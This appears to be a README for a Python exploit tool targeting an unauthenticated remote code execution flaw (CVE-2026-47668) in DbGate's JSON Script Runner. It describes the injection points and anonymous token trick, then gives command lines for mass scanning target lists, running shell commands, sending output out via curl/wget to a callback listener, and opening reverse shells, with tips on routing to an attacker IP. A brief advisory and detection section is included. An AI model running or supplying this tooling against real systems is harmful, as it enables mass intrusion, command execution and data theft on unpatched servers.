Share
## https://sploitus.com/exploit?id=59F46F2C-AA0C-55C8-A5DF-26C3D77881BC
# CVE-2026-47668
DbGate Unauthenticated Remote Code Execution


# CVE-2026-47668 โ€” DbGate Unauthenticated Remote Code Execution

**Proof-of-concept assessment tool for authorized security testing of DbGate JSON Script Runner RCE (GHSA-8v3q-9vmx-36vc).**

| Field | Value |
|--------|--------|
| **CVE** | CVE-2026-47668 |
| **Advisory** | [GHSA-8v3q-9vmx-36vc](https://github.com/advisories/GHSA-8v3q-9vmx-36vc) |
| **Severity** | Critical |
| **Product** | DbGate / `dbgate-serve` (npm) |
| **Affected** | DbGate `dbgate-serve` **โ‰ค 7.1.8** |
| **Fixed** | **โ‰ฅ 7.1.9** |
| **CVSS 3.1** | `AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H` |
| **CWE** | CWE-20, CWE-94, CWE-1188 |

---

## Executive Summary

DbGate versions **7.1.8 and earlier** are affected by a critical remote code execution flaw in the **JSON Script Runner**. User-controlled fields such as `functionName` and `variableName` are concatenated into dynamically generated JavaScript without adequate validation, allowing arbitrary code execution in the Node.js child process that runs runner scripts.

In deployments with **anonymous or default authentication**, an attacker may obtain a Bearer token via `POST /auth/login` and reach `POST /runners/start` without valid credentials. Successful exploitation can lead to full server compromise at the privilege level of the DbGate process.

---

## Vulnerability Details

**Title:** DbGate Unauthenticated Remote Code Execution via JSON Script Runner

**Description:** The JSON Script Runner builds JavaScript from attacker-influenced JSON `assign` commands. By injecting into `functionName` or `variableName`, an attacker can break out of the intended script context and invoke Node.js primitives (e.g. `child_process`) to run operating-system commands.

| Item | Detail |
|------|--------|
| **Primary endpoint** | `POST /runners/start` |
| **Related endpoint** | `POST /auth/login` (anonymous Bearer in affected deployments) |
| **Component** | JSON Script Runner |
| **Injection points** | `functionName`, `variableName` (JSON `assign` commands) |
| **Execution context** | Forked Node.js child process |
| **Authentication** | Bearer token required; may be obtainable without real credentials on misconfigured instances |

**Impact:** Arbitrary OS command execution, credential and file access, malware deployment, lateral movement, and denial of service.

**Business impact:** Data theft, host takeover, ransomware, credential compromise, and service disruption.

**Detection guidance:** Monitor for `POST /auth/login` followed by suspicious `POST /runners/start` bodies, unusual runner JSON, `child_process` activity, and unexpected outbound callbacks from the DbGate host.

**Recommendation:** Upgrade to **DbGate 7.1.9+** immediately. Disable anonymous auth, restrict network exposure (VPN/firewall), rotate secrets, and investigate hosts for compromise indicators.

---

## Contact

For questions, updates, and latest research:

| Channel | |
|---------|---|
| **Telegram** | [@KNxploited](https://t.me/KNxploited) |

---

## Tool: `CVE-2026-47668.py`

Python 3 assessment utility that automates vulnerability checks and controlled exploitation validation against **authorized** targets only.

### Capabilities

- **AUTO wizard** โ€” single prompt (URL or target list); automatic token, callback listener, and defaults
- **Single-target** and **mass scan** from a list file
- **Injection vectors:** `functionName`, `variableName`, or `both` (fallback)
- **HTTP exfil listener** โ€” confirms command output via callback (primary proof mode)
- **Optional TCP reverse connect** โ€” `--reverse-shell` for connectivity verification (not required for normal use)
- **Structured results** under `Nx/` with per-target exfil files and session summary
- **Preflight checks** โ€” list parsing, reachability, and token acquisition (single mode)

### Result classification

| Result | Meaning |
|--------|---------|
| `FAIL` | Target unreachable, auth failure, or runner rejected probe |
| `VULN` | Runner accepted injection probe; no command proof |
| `DISPATCH` | Exploit payload accepted; **no** confirmed output or reverse TCP |
| `EXFIL` | HTTP callback received with command output (**strongest proof**) |
| `REVSH` | Reverse TCP connection received (optional mode) |

> **Note:** `DISPATCH` means the server accepted the job, not that output was received. Treat `EXFIL` as confirmed command execution in callback mode.

---

## Requirements

```text
Python 3.9+
aiohttp
colorama
```

```bash
pip install -r requirements.txt
```

---

## Quick Start

### 1. Interactive AUTO (recommended)

```bash
python CVE-2026-47668.py
```

Examples at the prompt:

```text
http://192.168.1.10:3000
http://192.168.1.10:3000|id
http://192.168.1.10:3000|uname -a
targets.txt
```

### 2. CLI โ€” single target + command (no reverse shell)

```bash
python CVE-2026-47668.py --cli -u http://TARGET:3000 --cmd "id"
```

### 3. CLI โ€” vulnerability check only

```bash
python CVE-2026-47668.py --cli -u http://TARGET:3000 --check-only
```

### 4. CLI โ€” mass scan

```bash
python CVE-2026-47668.py --cli -f targets.txt --cmd id -t 30
```

### 5. CLI โ€” optional reverse TCP (single target)

```bash
python CVE-2026-47668.py --cli -u http://TARGET:3000 --reverse-shell LHOST:4444
```

Use an `LHOST` reachable **from the DbGate process** (e.g. Docker host gateway, not `127.0.0.1` from inside a container).

---

## How It Works

```text
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”     POST /auth/login      โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  Assessment โ”‚ โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ–บ โ”‚   DbGate     โ”‚
โ”‚   host      โ”‚ โ—„โ”€โ”€ Bearer token โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ”‚   server     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜                           โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
       โ”‚                                           โ”‚
       โ”‚     POST /runners/start (JSON inject)     โ”‚
       โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ–บโ”‚
       โ”‚                                           โ”‚
       โ”‚   child_process runs shell / callback    โ”‚
       โ—„โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
              HTTP exfil (default) or TCP revsh (optional)
```

1. Normalize target URL (default port **3000** when omitted).
2. Obtain Bearer token (`{"amoid":"none"}` by default) if not supplied.
3. Send a benign probe (`void 0`) to confirm the runner accepts injected `functionName` / `variableName`.
4. Dispatch a payload that executes a shell command and exfiltrates output via `curl`/`wget` to the built-in listener (**default**), or opens a reverse TCP session (**optional**).
5. Classify results and write artifacts to `Nx/`.

---

## Target List Format (`targets.txt`)

```text
# comments and blank lines are ignored
192.168.1.10
192.168.1.11:3000
http://dbgate.internal:3000
https://dbgate.example.com|uname -a
http://10.0.0.5|touch /tmp/pwned && ls -la /tmp/pwned
```

- Port **3000** is applied when no port is specified (including `https://host` without `:443`).
- Optional `|command` per line overrides the global `--cmd` for that host.
- Duplicates are deduplicated; invalid lines appear in `Nx/list_report.txt`.

---

## Output Layout

```text
Nx/
โ”œโ”€โ”€ vuln.txt          # Runner accepted probe
โ”œโ”€โ”€ dispatch.txt      # Payload dispatched, unconfirmed output
โ”œโ”€โ”€ exfil.txt         # Confirmed callback hits (log)
โ”œโ”€โ”€ revsh.txt         # Reverse TCP events (optional mode)
โ”œโ”€โ”€ failed.txt        # Unreachable / hard failures
โ”œโ”€โ”€ list_report.txt   # Parsed list (mass mode)
โ”œโ”€โ”€ exfil/            # Per-target command output
โ”‚   โ””โ”€โ”€ host_port.txt
โ””โ”€โ”€ sessions/
    โ””โ”€โ”€ YYYYMMDD_HHMMSS/
        โ””โ”€โ”€ summary.json
```

---

## CLI Reference

| Flag | Description |
|------|-------------|
| `--cli` | Use CLI instead of AUTO wizard |
| `-u`, `--url` | Single target URL |
| `-f`, `--file` | Target list file (mass mode) |
| `--cmd`, `--command` | Shell command (default: `id`) |
| `--check-only` | Probe only; no command execution |
| `--vector` | `functionName` \| `variableName` \| `both` |
| `--token` | Pre-set Bearer token |
| `--login-json` | Login body JSON (default: `{"amoid":"none"}`) |
| `-t`, `--threads` | Mass concurrency (default: 30) |
| `--port` | Default DbGate port for unparsed hosts (default: 3000) |
| `--timeout` | HTTP timeout seconds |
| `-c`, `--callback` | External callback URL (disables built-in HTTP listener) |
| `--callback-host` | IP/hostname embedded in callback / revsh dial address |
| `--listen-host` | Bind address for HTTP listener (default: `0.0.0.0`) |
| `--listen-port` | HTTP exfil port (default: 8888) |
| `--wait-exfil` | Seconds to wait for callback (single target) |
| `--mass-wait-exfil` | Per-target callback wait in mass mode (default: 8) |
| `--no-b64` | Disable base64 encoding in exfil payload |
| `--async-exec` | Use async `exec` instead of `execSync` |
| `--reverse-shell` | Optional `[LHOST:LPORT]` reverse TCP mode (single `-u` only) |
| `--revsh-port` | Default revsh port when endpoint omitted (4444) |
| `--revsh-bind` | Local revsh listen bind (default: `0.0.0.0`) |
| `--wait-revsh` | Seconds to wait for reverse TCP |
| `--revsh-interactive` | Basic stdin/stdout relay after TCP connect |
| `--secure` | Enable TLS certificate verification |

---

## Operational Notes

- **Docker / NAT:** Callback and reverse modes require a routable attacker IP from the DbGate runtime. Use the host gateway or LAN IP, not `127.0.0.1` visible only on your workstation.
- **Patched versions:** DbGate **โ‰ฅ 7.1.9** should reject the injection; expect `FAIL` or non-vulnerable behavior.
- **Mass accuracy:** `EXFIL` is attributed **per target URL** (no cross-target false positives from shared callbacks).
- **Reverse shell:** Optional verifier only; **HTTP exfil is the recommended proof path** for reliability and logging.

---

## Legal Disclaimer

This tool is provided for **authorized security testing, defensive research, and education** only.

The author is not responsible for misuse, damage, or illegal activity. You must have **explicit written permission** to test any system you do not own or operate. Unauthorized access to computer systems is illegal in most jurisdictions.

Use only on systems you are authorized to assess. Verify patch status and coordinate with asset owners before running exploitation checks in production environments.

---

**By: Nxploited**